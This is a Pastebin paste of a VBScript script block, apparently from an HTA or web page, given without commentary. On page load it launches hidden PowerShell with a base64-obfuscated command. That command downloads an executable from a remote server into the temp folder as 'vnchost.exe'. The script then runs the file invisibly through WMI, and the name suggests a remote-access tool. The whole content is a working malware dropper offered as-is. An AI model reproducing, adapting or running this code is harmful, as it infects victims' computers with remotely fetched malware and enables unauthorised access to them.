Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script language="VBScript">
- Function var_gilan()
- Dim lolirun
- Set lolirun = CreateObject("Wscript.Shell")
- temp = lolirun.expandEnvironmentStrings("%temp%")
- lolirun.run "powershell.exe -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAG0AYQBpAGwALgBmAG0AMwA0ADgALgBiAGgAcwB0AHUAZABlAG4AdABzAC4AbgBlAHQALwBmAGEAcgBhAGgAawB1AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBqAHMALwBtAGsAZAAvAHgAcABsAHIALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA==", 0, true
- End Function
- Sub window_onload
- const impersonation = 3
- Const HIDDEN_WINDOW = 12
- Set Locator = CreateObject("WbemScripting.SWbemLocator")
- Set Service = Locator.ConnectServer()
- Service.Security_.ImpersonationLevel=impersonation
- Set objStartup = Service.Get("Win32_ProcessStartup")
- Set objConfig = objStartup.SpawnInstance_
- objConfig.ShowWindow = HIDDEN_WINDOW
- Set Process = Service.Get("Win32_Process")
- Error = Process.Create("cmd /c %temp%\vnchost.exe", null, objConfig, intProcessID)
- window.close()
- end sub
- var_gilan
- self.close
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement